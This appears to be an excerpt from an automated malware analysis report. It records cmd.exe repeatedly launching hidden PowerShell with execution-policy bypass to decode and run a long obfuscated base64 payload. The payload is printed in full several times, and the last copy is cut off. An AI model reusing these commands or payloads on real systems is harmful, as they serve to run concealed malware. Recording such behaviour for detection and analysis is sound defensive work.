qujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc